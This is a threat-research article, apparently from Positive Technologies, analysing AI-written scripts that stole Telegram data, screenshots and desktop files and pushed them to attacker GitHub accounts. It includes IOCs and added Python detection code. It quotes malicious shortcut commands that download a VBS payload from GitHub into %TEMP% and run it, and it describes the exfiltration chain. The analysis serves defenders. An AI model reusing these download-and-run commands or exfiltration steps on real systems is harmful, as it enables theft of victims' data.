While researching malware used by attacker groups, we came across a series of unusual attacks that used GitHub repositories to store malicious files and victim data. These campaigns appear targeted rather than large-scale, and it seems the attackers relied heavily on AI during development. The earliest activity we traced was in September 2024, and the most recent in April 2025.

Our Threat Intelligence team investigates complex attacks featuring novel persistence and data collection methods and unique infrastructures. Sometimes we find simple two-line scripts, and other times we run into "bombs" that trigger dozens of different payloads at once. But it's pretty rare for us to come across such long chains of really simple AI-written scripts that still work, tied together in a way that clearly wasn't random. Think of this as an APT-style attack implemented at the "script kiddie" level (a derogatory term in hacker culture for those who rely on scripts or programs written by others).

How it started

While working on one of our tasks, we stumbled across a suspicious file with a similar name and a double extension, which immediately caught our attention:

document.docx.lnk SHA-256: 6bea2d17c26ffc7cec6d6e9c7d8548c5d8ce75e5523bfc7f3bfcde4f055848ff

We were particularly interested in a command that downloaded the hidden.vbs file from GitHub and started a legitimate PDF file retrieved from the Cayman Islands online library.

/min cmd /c curl -o %TEMP%\hidden.vbs https://raw.githubusercontent.com/jacker8181/fff/refs/heads/main/hidden.vbs && cd %TEMP% && start hidden.vbs && start https://cnslibrary.com/wp-content/uploads/2024-2026-SPS.pdf
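The shortcut argument string above carries several indicators a defender can key on: a double-extension file name, a minimised cmd /c wrapper, a download tool writing into %TEMP%, a payload fetched from raw.githubusercontent.com, and a `start` of the downloaded script. The following Python is an added example, not code from the article or from Positive Technologies, that scores a shortcut's name and argument string against those indicators. The extension sets and regular expressions are assumptions made for the example; the first sample reuses the argument string quoted above, the second is a constructed benign shortcut for contrast.

```python
import re

# Extension sets used for the double-extension check (assumed lists for this
# example, not taken from the article).
DOC_EXTS = {".docx", ".doc", ".pdf", ".txt", ".xlsx", ".xls", ".rtf"}
EXEC_EXTS = {".lnk", ".vbs", ".bat", ".cmd", ".ps1", ".js", ".hta", ".exe", ".scr"}

# Heuristics for the shortcut's "Arguments" field (or an equivalent process
# command line). Assumed patterns modelled on the chain described above.
DOWNLOAD_TOOL = re.compile(r"\b(curl|certutil|bitsadmin|wget|Invoke-WebRequest|iwr)\b", re.I)
TEMP_PATH = re.compile(r"%TEMP%|\\AppData\\Local\\Temp\\", re.I)
RAW_GITHUB = re.compile(r"raw\.githubusercontent\.com/[^\s\"']+", re.I)
START_SCRIPT = re.compile(r"\bstart\s+(?:\"\"\s+)?[\w.\\%~-]+\.(?:vbs|bat|cmd|ps1|js|hta)\b", re.I)
MIN_CMD = re.compile(r"/min\s+cmd(\.exe)?\s+/c", re.I)


def double_extension(name: str) -> bool:
    """True for names such as document.docx.lnk: a document-looking extension
    immediately followed by an executable or shortcut extension."""
    parts = name.lower().rsplit(".", 2)
    if len(parts) < 3:
        return False
    _, middle, last = parts
    return f".{middle}" in DOC_EXTS and f".{last}" in EXEC_EXTS


def analyze_lnk(name: str, arguments: str) -> list:
    """Return the list of indicators found for one shortcut (empty = nothing seen)."""
    findings = []
    if double_extension(name):
        findings.append("double-extension shortcut name")
    if MIN_CMD.search(arguments):
        findings.append("minimised cmd /c wrapper")
    if DOWNLOAD_TOOL.search(arguments) and TEMP_PATH.search(arguments):
        findings.append("download tool writing into %TEMP%")
    match = RAW_GITHUB.search(arguments)
    if match:
        findings.append("payload fetched from " + match.group(0))
    if START_SCRIPT.search(arguments):
        findings.append("downloaded script launched with start")
    return findings


# Constructed samples: the first reuses the argument string quoted in the
# article, the second is a benign shortcut made up for contrast.
SAMPLES = [
    ("document.docx.lnk",
     r"/min cmd /c curl -o %TEMP%\hidden.vbs https://raw.githubusercontent.com/jacker8181/fff/refs/heads/main/hidden.vbs "
     r"&& cd %TEMP% && start hidden.vbs && start https://cnslibrary.com/wp-content/uploads/2024-2026-SPS.pdf"),
    ("Quarterly report.lnk", r"C:\Windows\System32\notepad.exe C:\Reports\q1.txt"),
]

if __name__ == "__main__":
    for shortcut_name, args in SAMPLES:
        hits = analyze_lnk(shortcut_name, args)
        print(f"{shortcut_name}: {'SUSPICIOUS' if hits else 'clean'}")
        for hit in hits:
            print("  -", hit)
```

Each indicator on its own is weak (developers use curl, and %TEMP% is a normal scratch location); the value is in the combination, which is why the function returns the full list rather than a single boolean, leaving the severity threshold to the caller.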

The script referenced a GitHub user jacker8181, who has two repositories: fff and tune:

Figure 1. GitHub account jacker8181

The fff repository contains two files:

  • hidden.vbs SHA-256: eee0cca526348c2bf393574df418e43ca192671458a4d4d0d5d8d09206ad7757

  • unp.bat SHA-256: 2e7bd3ac84f3e4014274ec418f6d0467748b8fcbe858c50bdaf84becf97da023

At this stage, hidden.vbs already stands out because of its coding style—there are comments for each function and an overall layout that strongly suggests it was produced using AI prompts:

Figure 2. Contents of hidden.vbs

This script downloaded a ZIP archive from filebin.net, and then another script, unp.bat, unpacked that archive and started the next file in the chain—git_v.vbs:

Figure 3. Contents of git_v.vbs

The tune repository contained a folder with Telegram data (tdata) and files apparently related to the victim's system, such as system_unfo.txt:

Figure 4. Contents of system_unfo.txt

In this case, the tune folder did have files, but they were all empty (0 KB), and the system files don't give us enough to identify the victim.

Nonetheless, we started collecting data on these incidents and proceeded to analyze the entire chain.

Full attack chain

We were unable to identify the initial attack vector, but it looks like the attacks started with emails containing malicious ZIP or RAR attachments. As an example, let's take the file document.zip SHA-256: d83eb2bc85d29d8fe7bcfb1383de3643fcf8f5523ccf02167de1bcc298aa14fd

The attack chains are quite long and convoluted. Here's a visual representation:

Figure 5. Attack chain diagram

The archive contains fille_docu.lnk SHA-256: 08f6cb6d682c9fc9ea895f4bd71ada780a66882aa7330137be6f17fae755eb4a with the following script:

/min cmd /c curl -o %TEMP%\hidden.vbs https://raw.githubusercontent.com/Allsafetui/lex/refs/heads/main/hidden.vbs && cd %TEMP% && start hidden.vbs && start https://career.habr.com/olya-yurievna.pdf"%systemroot%\system32\imageres.dll

The attacker tried to use a resume from career.habr as bait, but it's highly unlikely that the referenced PDF actually existed at that path.

This GitHub account no longer contains any repositories:

Figure 6. GitHub account Allsafetui

Since hidden.vbs was downloaded from GitHub and there are no files in the Allsafetui account now, it's impossible to retrieve the exact file that was used. However, we found two files related to this repository:

  • hidden.vbs SHA-256: 2b2dc11a9adbc40813b6290a4b117f37ab940c3baebedf19948ba5b7935ab754

  • hidden.vbs SHA-256: 658c9f9f6f695c4295db4552326fec1daac621f1fcba63b52ff0c704885f1473

The functionality of both files is identical to that of hidden.vbs; the only difference is the links to Best_Gits.zip.

hidden.vbs downloads unp.bat, which unpacks Best_Gits.zip SHA-256: 11d11058d955a03d2fc7270c2968b35867903f4f11b0e23c0aa56655a28df4b8 into a temporary folder and executes the first script, git_v.vbs:

Figure 7. Contents of git_v.vbs

The Best_Gits.zip folder has the following structure:

Figure 8. Structure of the extracted Best_Gits folder

git_v.vbs runs git.cmd in a hidden window:

Figure 9. Contents of git.cmd

git.cmd immediately runs hidden_runs.vbs, waits five minutes, runs t.vbs, waits another ten minutes, and then pushes the contents of the LO folder to the GitHub repository.

Let's examine hidden_runs.vbs up to the TIMEOUT command. This script is a wrapper that runs three other scripts:

Figure 10. Contents of hidden_runs.vbs

  1. The first script is password_grab.cmd. This script searches the user's desktop for files by name and saves them to LO/info_desktop. It was most likely generated using a sophisticated AI prompt, something like "create a script that steals passwords":

     Figure 11. Contents of password_grab.cmd

  2. screenshot.cmd runs screen.ps1 in a hidden window using PowerShell, and screen.ps1 collects data. The comments added by AI conveniently explain the functionality:

     Figure 12. Contents of screenshot.cmd
     Figure 13. Contents of screen.ps1

  3. The third script is also thoroughly commented. It collects system data and saves it to system_info.txt:

     Figure 14. Contents of system.bat

As mentioned earlier, git.cmd ran t.vbs five minutes after starting hidden_runs.vbs. The script stopped the Telegram process and copied Telegram data (tdata) to LO/tdata:

Figure 15. Contents of t.vbs

After another 10-minute wait—by which time the scripts should have collected the data—the files were pushed to https://github.com/Allsafetui using libraries and a modified git.exe version, authenticating with a personal access token and with SSL certificate verification disabled.
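The timing of the chain (download, script execution, Telegram stopped after five minutes, git push after another ten) is itself a signal: on one host these steps land within a short window, and an ordinary developer push is never preceded by a download from raw.githubusercontent.com into %TEMP%. The Python below is an added example, not code from the article or from Positive Technologies, that correlates process-creation events per host and raises an alert when the download-to-push sequence completes within a window. The stage regexes, the 30-minute window, the credential-in-URL pattern and the event records are all assumptions constructed for the example; account and token values are placeholders.

```python
import re
from datetime import datetime, timedelta

# Stage signatures for process-creation telemetry (e.g. Sysmon event ID 1).
# Each regex is an assumption about how the step would appear in a command
# line; none is copied from the samples described in the article.
STAGES = [
    ("download", re.compile(r"%TEMP%.*raw\.githubusercontent\.com|raw\.githubusercontent\.com.*%TEMP%", re.I)),
    ("script_run", re.compile(r"\b[wc]script\.exe\b.*\\Temp\\.*\.vbs\b", re.I)),
    ("telegram_stop", re.compile(r"\btaskkill(\.exe)?\b.*\btelegram\.exe\b", re.I)),
    ("exfil_push", re.compile(r"\bgit(\.exe)?\b.*\bpush\b", re.I)),
]
SSLVERIFY_OFF = re.compile(r"http\.sslverify\s*=?\s*false", re.I)
# Userinfo (a token) embedded in the remote URL: an assumed shape for the
# example, not something observed in the samples.
CREDENTIAL_IN_URL = re.compile(r"https://[^/\s@:]+@github\.com/", re.I)
# The chain waits 5 + 10 minutes before pushing, so a 30-minute window
# comfortably covers download-to-push on one host (assumed threshold).
WINDOW = timedelta(minutes=30)


def classify(cmdline: str):
    """Map one command line to a chain stage name, or None if it matches nothing."""
    for stage, pattern in STAGES:
        if pattern.search(cmdline):
            return stage
    return None


def correlate(events):
    """events: iterable of (iso_timestamp, host, command_line).
    Returns one alert per host where a download from raw.githubusercontent.com
    into %TEMP% is followed by a git push within WINDOW."""
    by_host = {}
    for ts, host, cmd in events:
        stage = classify(cmd)
        if stage:
            by_host.setdefault(host, []).append((datetime.fromisoformat(ts), stage, cmd))
    alerts = []
    for host, hits in by_host.items():
        hits.sort()
        first_seen = {}
        for ts, stage, cmd in hits:
            first_seen.setdefault(stage, (ts, cmd))
        if "download" not in first_seen or "exfil_push" not in first_seen:
            continue
        download_ts, _ = first_seen["download"]
        push_ts, push_cmd = first_seen["exfil_push"]
        delta = push_ts - download_ts
        if timedelta(0) <= delta <= WINDOW:
            alerts.append({
                "host": host,
                "stages": [stage for _, stage, _ in hits],
                "minutes_to_push": round(delta.total_seconds() / 60, 1),
                "ssl_verify_disabled": bool(SSLVERIFY_OFF.search(push_cmd)),
                "credential_in_url": bool(CREDENTIAL_IN_URL.search(push_cmd)),
            })
    return alerts


# Constructed events: one host running the full chain, one host doing an
# ordinary push (no download stage, so no alert). Account and token are placeholders.
SAMPLE_EVENTS = [
    ("2025-04-01T10:00:00", "WS-17",
     r"cmd.exe /c curl -o %TEMP%\hidden.vbs https://raw.githubusercontent.com/EXAMPLE-ACCOUNT/fff/refs/heads/main/hidden.vbs && cd %TEMP% && start hidden.vbs"),
    ("2025-04-01T10:00:05", "WS-17", r"wscript.exe C:\Users\user\AppData\Local\Temp\hidden.vbs"),
    ("2025-04-01T10:05:20", "WS-17", r"taskkill.exe /F /IM Telegram.exe"),
    ("2025-04-01T10:16:00", "WS-17",
     r"C:\Users\user\AppData\Local\Temp\Best_Gits\git.exe -c http.sslVerify=false push https://TOKEN-PLACEHOLDER@github.com/EXAMPLE-ACCOUNT/tune.git main"),
    ("2025-04-01T11:30:00", "BUILD-02", r"C:\Program Files\Git\cmd\git.exe push origin main"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Requiring the download stage before the push keeps a developer's normal git activity quiet; a push run from a Temp directory with http.sslVerify disabled, or with a credential embedded in the remote URL, is still worth a lower-severity alert on its own, and the two boolean fields in the alert are there so a SIEM rule can raise the severity when they are set.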

The archive also contained a file called screenshot_hiden.cmd, but this file wasn't used anywhere and was basically a duplicate of the regular screenshot.cmd file, only without the "hidden" function (yet it has "hidden" in the name):

Figure 16. Contents of screenshot_hiden.cmd

Other accounts

In the jacker8181 account, we found data collected from the victim's computer, but the files did not contain sensitive information and, judging by their names, looked like the output of a run in a sandbox environment. We also found a few other attacker accounts, but most of them have been deleted. One account was still active and contained the following files:

Figure 17. GitHub account jockop77

This is the earliest account we located. Based on the commits, it was still active in September 2024.

The account contained three repositories:

1) "-" contains a readme.md file with a single "-" character.

2) fff contains hidden.vbs and unp.bat.

3) tet contains a text file called t.txt.

t.txt contains a message demanding $50,000 to be delivered to an old library on a Friday night and looks completely out of place in the overall context:

Figure 18. Contents of t.txt

The attacker uploaded hidden.vbs and unp.bat on September 16, 2024, at 16:17:28 using the email address danatolevic544@gmail.com. At 16:18:13, a file (likely a test file, which also appears in git.cmd) was uploaded by myemail@example.com:

Figure 19. Possible test commit by the attacker

We found six accounts in total, although the actual number may be higher because about half have already been deleted. In every case we examined, the code created a data folder and pushed it to a GitHub account, suggesting these were likely targeted attacks rather than mass campaigns. The pattern appears to be "one account—one victim," unless the attackers had an automated workflow that notified them of new commits and automatically retrieved files before cleaning up.

However, judging by the jacker8181 account, which still has the tune repository, it's unlikely that such an automation was implemented.

GitHub account                  Status
https://github.com/Allsafetui   Active, no files
https://github.com/jacker8181   Active
https://github.com/jockop77     Active
https://github.com/stomy707     Inactive
https://github.com/mike22244    Inactive
https://github.com/jocki70      Inactive

IOCs

hidden.vbs:
2b2dc11a9adbc40813b6290a4b117f37ab940c3baebedf19948ba5b7935ab754
658c9f9f6f695c4295db4552326fec1daac621f1fcba63b52ff0c704885f1473
c443829a81bcf8565686c6395f1eddedecac4175b97d77678907c8b1453c70e3
231d60a57386b26c7ac96124adf357646731b7338874c62f5e3af7950da87e28
2b8bcbefb5876395958160a6f831e660f212865aac124f275977995cc8e5d7a4
04a459443bd8015089afd946ea088a0cf6141a9c7f28a954c1fd27826cf95422
eee0cca526348c2bf393574df418e43ca192671458a4d4d0d5d8d09206ad7757
8c747c1319dc5564b15ddb0ba913f347ab22fbb5bbbc3ee88f99096245f87ea0

Best_Gits.zip:
b3315bfa572827aae2b4c1ce658617514081fae0d7731d0861ea8bee974db1ca
eb2e455ceadbbb28dd09fa966bb7268fa817f2a749af899811017ce3964b8a74
11d11058d955a03d2fc7270c2968b35867903f4f11b0e23c0aa56655a28df4b8
047f0735b7ec7f9666e0430b7aaf578bedeff555c3fa286e4bf11bf9afcfeaee
b3576ffd3d5db8f5fc095e010a1cfe13a7065d90f336a0be6f63b2a141a75114
564ca80990e27c4e1d881835b4a051a813f29874eeca942c5f278031531c4b19

Other files:
b.rar                    51ec727fabb6ffc26a6100a56da6919a4f869076deb1ecfbfa85eb5b5cc32bdb
unp.bat                  6f4b22f593af20b1bae21370efebed2699d407b139befa546d982c7c2fbef9b0
unp.bat                  2e7bd3ac84f3e4014274ec418f6d0467748b8fcbe858c50bdaf84becf97da023
f_62167fba570ac718.zip   9e936bacfb2e22658c1cc77fbef583a3bbc36599608949f0850a69505894d3db
document.zip             d83eb2bc85d29d8fe7bcfb1383de3643fcf8f5523ccf02167de1bcc298aa14fd
payload_1.zip            c0c04d2e43ba6910bae4b0aaa2ebdc7069a365ff9a75aa98b4c5342161d45e87
doc390234.zip            3f4f86fac8e2c040c138b6d2a14cf6856b83951415df1bffcd2be2ac596af572
code.zip                 45fc1fadc5a0c5e34f68e8822128fca3f1dcb8c5e040625287b503e021f22366
document.docx.lnk        6bea2d17c26ffc7cec6d6e9c7d8548c5d8ce75e5523bfc7f3bfcde4f055848ff
document.docx.lnk        5a3da63fa0d00f9409ab6feeafd7638b35039e0543d511785c5fb36fcfae20cb
telegram bot code.lnk    b7fe85a96eb2c4d079f9f0070d623e2e9278abd41c62f2582500e91b58403409
codepen.lnk              c9175e179e86a5f653373c540ac8663a741f26e693268d3080586291b1f44c43
codepen.txt.lnk          34c594b8a5920cbe9a8758ad196b0ef1b837fa4135f6e7324ad8e8b6c68b45c0
doc_237943_.lnk          268e5e051ae4866ca72055c9b6f10fdd6e68eb247b61ce987a219c2324dc5179
fille_docu.lnk           08f6cb6d682c9fc9ea895f4bd71ada780a66882aa7330137be6f17fae755eb4a
doc_237943_.lnk          f73a1fb7d2b44ebc0136cfdd6a70db7b948c7ccfa6f234dca56237c5b0a6c03a
doc390234.pdf.ln         7672312e3df69bccf57d0ac595920cd4e9d3dc14e70532c39a367b4bd205d339


Alexander Badaev

Information security threat researcher, Positive Technologies Expert Security Center